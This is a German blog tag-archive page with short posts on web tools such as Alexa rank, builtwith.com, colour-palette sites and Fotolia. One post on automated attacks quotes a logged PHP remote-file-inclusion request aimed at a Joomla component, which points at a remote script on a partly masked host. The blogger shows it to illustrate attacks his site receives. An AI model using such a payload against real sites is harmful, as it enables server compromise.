Tag Archives: website

Neues vom Alexa Traffic Rank

Einige werden sich erst mal fragen, was denn der Alexa Traffic Rank (1996) einer Seite ist und was er aussagt. Erstmal versucht der Dienst alexa.com einen Traffic Rank zu erstellen, welcher Informationen darüber geben soll wie viele Webseitenzugriffe täglich stattfinden. Bei beliebteren Seiten wird der Rank auch als Graph angezeigt.

Das Tochterunternehmen von Amazon versucht also mit Hilfe vom Surf-Verhalten verschiedener Benutzer welche die Alexa-Toolbar installiert haben ein Ranking der Beliebtheit zu erstellen. Zudem wird angegeben, dass die Qualität und die Links einer Seite mit eine Rolle bei der Auswertung spielen. Zusammenfassend also eine riesige Datenbank mit den Gewohnheiten vieler Benutzer, das klingt schon mal nicht sehr nach Privatsphäre. Aus dem Haufen Informationen listet der Dienst dann die TOP 100.000 Webseiten für Deutschland, USA und andere Länder. Außerdem bringt man oft den Dienst archive.org mit Alexa in Verbindung. Dort kann man sich ältere Versionen einer länger existierenden Webseite anschauen. Continue reading

Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt: Continue reading

builtwith.com – Aus was ist die Webseite?

builtwith.jpgMit dem Dienst von builtwith.com kann man sich schnell und einfach die wesentlichen technischen Bestandteile einer Internetpräsentation anschauen. Das Konzept erinnert stark an seitwert.de.

Es werden technische Aspekte wie die Verwendung von Google Analytics, Javascript-Programmen, Widgets, Frameworks, Encoding und die Funktion der Verbreitung einer Webseite getestet. Beispielsweise ob diese einen RSS-Feed besitzt oder nicht.

Außerdem ist es möglich sich bei dem australischen Dienst anzumelden und einen ausführlicheren Report zu bekommen. Wie der Unterschied im einzelnen ist, konnte ich noch nicht in Erfahrung bringen. Vielleicht hat jemand damit Erfahrung gemacht und möchte diese mitteilen. Continue reading

Für Webmaster und Webdesigner

Wer Photoshop kennt und liebt, wird sicherlich einiges mit den Tipps und Tricks aus 2007 zu Photoshop anfangen können. Der Experte Michael Mayerle, ulrich-media GmbH stellt kostenlose PDFs zum Download bereit. Darunter eben auch diese Trickliste.

Kurz Beschreiben geht es um die Werkzeuge, die Handhabung mit RAW-Dateien, Metadaten, Bildauflösung, Farbraumkonvertierung, Auswahlen, Graustufe-Modus, Bunt- und Unbuntaufbau und vielem mehr. Neben kompakten Angaben wird nützliches Hintergrundwissen weitergegeben. Sicherlich lohnenswert!

tartanmaker.jpg

Der Dienst von tartanmaker.com bringt die kostenlose und eine Möglichkeit mit wenigen Klicks einen karierten Hintergrund für seine Website zu gestalten.

Man kann neben den drei Linienfarben (per #RBG) die genaue Form und Detailnähe auswählen. Anschließend kann man sich das Ergebnis in einer Vorschau präsentieren lassen und danach im .png Format herunterladen. Continue reading

Eine harmonische Farbpalette bestimmen

colorbender

Ein sehr guter Service für Webdesigner ist sicherlich Colorblender.de. Dort kann man eine Farbvariation auswählen und sich dazu weitere harmonierende Farben anzeigen lassen. Es besteht sogar die Möglichkeit diese Farbpalette per Photoshop Color Table, Illustrator Colors oder per E-Mails sich schicken zu lassen.

Auch eine stufenweise Verstellmöglichkeit ( Heller, Dunkler, mehr Farbe, weniger Farbe etc.) ist möglich.

Auf colorhunter.com kann man anhand eines Bildes seine Farbpalette bestimmen lassen. Auch mit Hilfe eines Stichwortes oder einer einzigen Farbangabe bekommt man fünf sympathisierende Farben vorgeschlagen.

Qualitative Fotos zum kleinen Preis

Dann ist Fotolia.de sicherlich eine gute Adresse um qualitativ Hochwertige Fotos aus jeder Abteilung zu erstehen.

Angefangen bei 0,83 Euro pro Bild für die eigene Website oder sogar um es zu drucken. Der Vorteil ist, man kann bei Interesse als Hobby-Fotograf auch selbst gute Bilder hochstellen und verkaufen.

Insgesamt habe ich mit der Anwendung gute Erfahrungen gemacht und kann diese jedem empfehlen. Es gibt nur sehr hohe Qualitätsansprüche, wenn man seine Bilder dort verkaufen möchte. Diese sollte man nicht unterschätzen. Auch die moderne und interaktive Oberfläche lässt fast keine Wünsche offen.

Jedoch ist es gar nicht so einfach ein Bild zu verkaufen, es muss einigen professionellen Kriterien entsprechen, bevor es online gestellt wird. Jedes Bild wird einzeln von einem Moderator überprüft und abgelehnt oder freigeschalten.